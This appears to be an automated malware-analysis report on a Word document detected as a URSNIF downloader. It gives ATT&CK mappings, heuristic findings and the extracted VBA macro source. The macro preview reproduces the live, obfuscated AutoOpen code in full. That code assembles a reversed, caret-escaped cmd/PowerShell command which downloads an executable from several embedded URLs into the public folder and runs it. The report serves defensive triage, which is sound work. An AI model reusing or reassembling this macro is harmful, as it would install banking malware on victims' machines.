MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.URSNIF-6729855-3. It contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This function is used to execute arbitrary commands, strongly suggesting the macro's purpose is to download and execute a secondary payload. The presence of legacy WordBasic markers and the AutoOpen macro indicate a common technique for initial execution in malicious documents.
Heuristics 7
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Hour "86907533" + "FVM" + "CEVqmvjjdiaHq" + "fiwOV" VBA.Shell CleanString(nw) + fBwHPqz + XIiGasEt + zLoVYvwUjd + wNVRaCTTRDZ + ZmsVpwIv + vWEPjzldwzlrz + jBcjRviKanpC, 10 - 10 Hour "ik" + "205540774" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On _ -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5581 bytes |
SHA-256: 3a3a3aff9dff2a7bafc4be734b3ca555619093b639ff3e53eb970004ba00fb20 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
58 of 94 identifiers look randomly generated (e.g. 'hIvqLcjTiDitUI'); 4 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "dQWziwtvfzDdA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "8130" + "NCCBXS" + "419625218" + "fRbaJV"
Hour "2226" + "fwrjLCb" + "338855919" + "jmiklLwjLlX"
Hour "98634570" + "2629" + "514781394" + "6252"
Hour "429" + "8481"
Hour "86907533" + "FVM" + "CEVqmvjjdiaHq" + "fiwOV"
VBA.Shell CleanString(nw) + fBwHPqz + XIiGasEt + zLoVYvwUjd + wNVRaCTTRDZ + ZmsVpwIv + vWEPjzldwzlrz + jBcjRviKanpC, 10 - 10
Hour "ik" + "205540774"
End Sub
Attribute VB_Name = "FEialRJiNBcZf"
Function zLoVYvwUjd()
On _
Error _
Resume _
Next
Hour "s" + "5386"
Hour "wGZrnWV" + "GiX"
nKYwiHm = "cmd /V^" + ":^ON/C" + Chr(2 + 5 + 4 + 4 + 19) + "^s^e^" + "t " + "^i"
Hour "2786" + "FvZm"
Hour "340207480" + "HTEsjuqK" + "pkDwRwEFuU" + "GBE"
ucTCcZbivf = "^T=" + "^ " + "^ " + "^ ^ " + "^" + " ^ " + "^ " + "^" + " ^}" + "^"
Hour "E" + "891"
Hour "Ti" + "499555232"
RtNImGt = "}^" + "{^hc^t" + "^a" + "c^" + "};ka^e" + "rb^" + ";^Hnd$^"
Hour "idCj" + "sfK"
Hour "63727881" + "uT"
nUHkziLB = " m" + "e^tI-^e" + "^" + "kovn^I" + "^;" + ")Hn^d"
Hour "Bq" + "SikGPo" + "hpKAQLVDG" + "TBZmbivUnVb"
Hour "Q" + "293078682" + "148581488" + "c"
awcur = "^$^ ^" + ",^" + "w" + "^jW" + "^$(^" + "e^l" + "iFd" + "^a"
Hour "YN" + "524895905" + "DizLjzU" + "446"
Hour "GYOO" + "bDVKQFYPHJ"
Hour "En" + "9363"
Hour "Rrrv" + "4893"
Hour "bSUtjuroKZi" + "2173" + "96499098" + "7485"
EzInq = "^o^lnwo" + "^D.^jk^" + "d" + "^" + "${yr^t{" + ")I"
Hour "E" + "RmnvPiW" + "Tcu" + "hIvqLcjTiDitUI"
Hour "ahc" + "5280" + "249075173" + "V"
zzXAiiz = "Cz" + "$^ n" + "i ^w" + "^jW" + "$(hc" + "^aero^"
Hour "RsacB" + "Rbn"
Hour "252944644" + "354663578" + "YEdzjclrN" + "1969"
pcAkdrk = "f^;" + "^'e" + "x^e" + ".'+" + "Tv^s$+" + "'\^'^+c" + "^i^l^bu" + "p:vne$^" + "=Hn^" + "d$;^'2"
Hour "281874079" + "GVpAlztd" + "6712" + "ZTZTBDR"
Hour "GFWiocw" + "tYjQUXXQTH" + "mfb" + "UEwk"
lNvzrDHjfhQ = "2" + "'^ " + "^" + "=^ ^Tvs" + "$;)^'" + "^@'" + "(ti^l^p"
Hour "389623615" + "75102155"
Hour "Uv" + "9442"
Hour "oEbjMEBGUuIFwB" + "3359"
LBzPYs = "^S" + "^.'^b^" + "1C^Sj^" + "5b/h" + "c^.aide" + "mk" + "^am//:" + "^" + "p^" + "tt^h^@^"
zLoVYvwUjd = nKYwiHm + ucTCcZbivf + RtNImGt + nUHkziLB + awcur + EzInq + zzXAiiz + pcAkdrk + lNvzrDHjfhQ + LBzPYs
Hour "EJGiLBaqs" + "GLAPVsZj" + "362946897" + "saA"
Hour "467210765" + "UZa" + "toDa" + "2457"
Hour "340525479" + "PmV"
End Function
Function wNVRaCTTRDZ()
On _
Error _
Resume _
Next
Hour "225380717" + "B" + "8428" + "463"
Hour "Mv" + "210913312"
Hour "3251" + "in" + "W" + "qp"
EYJaaSAzFL = "el" + "^a^m^P" + "^0^O/a" + "c.^e" + "rv^eil" + "^al"
Hour "1624" + "3628"
Hour "Jla" + "zDofMY" + "iXGGIrkjWiZFvI" + "469"
Hour "lk" + "9346"
ctUrwAoA = "//:^" + "pt^" + "t^h" + "@ViXSF" + "^h^J^" + "8^B^I" + "/s^e^" + ".^e" + "s^o" + "^j^y^"
Hour "516834778" + "426093423" + "iWRlDvCSo" + "2684"
Hour "tQ" + "QjvfF"
Hour "188991233" + "30295005" + "LiwmY" + "v"
Hour "Lr" + "1400" + "182748928" + "r"
BnNNiqN = "a" + "mni//^" + ":^p^t" + "^t^h@x^" + "pC3V96/" + "^ua^" + ".moc^." + "r^a^" + "l^"
Hour "2474" + "P"
Hour "wA" + "iTU"
Hour "riJ" + "wC" + "vIFdtWOTa" + "dtq"
Hour "PfUqPwRqJ" + "518810957" + "DqBZB" + "TnHw"
Hour "Eh" + "OkfzJj" + "Vh" + "dzhYiB"
wYGwRiwN = "uc^s" + "^avcn" + "//" + ":p^t" + "t" + "h^@6" + "^Z" + "6^j^" + "g" + "lyz^o/" + "mo"
Hour "XrG" + "172967593"
Hour "avsVK" + "Yajkpp" + "44911211" + "sDAuIZWOP"
Hour "zlMqp" + "SCiCHm"
Hour "7585" + "jhCtpbqi"
OvrYihRHqk = "c.^aid" + "n^a" + "^l^" + "otro^hs" + "^o^lo" + "^b//:" + "p^t"
Hour "5533" + "252"
Hour "274389555" + "3305" + "hiETDKCc" + "YUhlK"
Hour "9277" + "HvlRPQk" + "133862641" + "6966"
Hour "8542" + "wujJ"
ZnFmUOwvFw = "th'^" + "=I" + "Cz$^" + ";" + "tnei" + "lC" + "b^e" + "^W" + "." + "t^e"
Hour "zQCCC" + "8310"
tjVsmJ = "N^ " + "^tc^e^j" + "^b^o-" + "wen^=^j" + "^k^" + "d^" + "$ ^" + "l^lehs" + "re" + "^wop&&^"
wNVRaCTTRDZ = EYJaaSAzFL + ctUrwAoA + BnNNiqN + wYGwRiwN + OvrYihRHqk + ZnFmUOwvFw + tjVsmJ
Hour "9074" + "254946117" + "897" + "jzOzwjI"
End Function
Function ZmsVpwIv()
On _
Error _
Resume _
Next
Hour "7359" + "206177843"
Hour "wWDQh" + "325981905" + "6192" + "10554456"
Hour "Yq" + "iLnoY"
hOZiYJt = "f^o" + "r /" + "^L %" + "^" + "M ^in" + " (3^" + "64" + "^;^-^1;" + "0)d^o" + " ^s^" + "e^t Cr" + "^9^"
Hour "WhpsvphHLl" + "7671"
Hour "411580923" + "WR"
JwLDUoklwwW = "S=!" + "Cr" + "^9" + "^S" + "!!^i^T"
Hour "90145346" + "360860213" + "irSFMMLThlGGI" + "GKzvOjNaDKc"
Hour "ATFPNiaaX" + "bLiOizj" + "GrFFwV" + "353048503"
ujzYGDROIO = ":~%" + "^M" + "," + "1" + "!&&i^f" + " %^M" + "=^=^0 "
Hour "Phsq" + "UTluGAHN"
Hour "oId" + "3278"
Hour "1290" + "209487725" + "suWj" + "UviIRY"
CzitHUd = "c^" + "a" + "^l" + "l " + "%Cr" + "^9" + "^S:^~^6" + "%" + Chr(2 + 5 + 4 + 4 + 19) + " "
ZmsVpwIv = hOZiYJt + JwLDUoklwwW + ujzYGDROIO + CzitHUd
Hour "bmO" + "335833382" + "6198" + "442862619"
Hour "102441879" + "KTznlOzn" + "443004763" + "cGpntA"
Hour "5901" + "350184590" + "8034" + "HnnudT"
Hour "405226411" + "oqX" + "h" + "zj"
Hour "494131470" + "243852761" + "cNtYiHjhP" + "7523"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.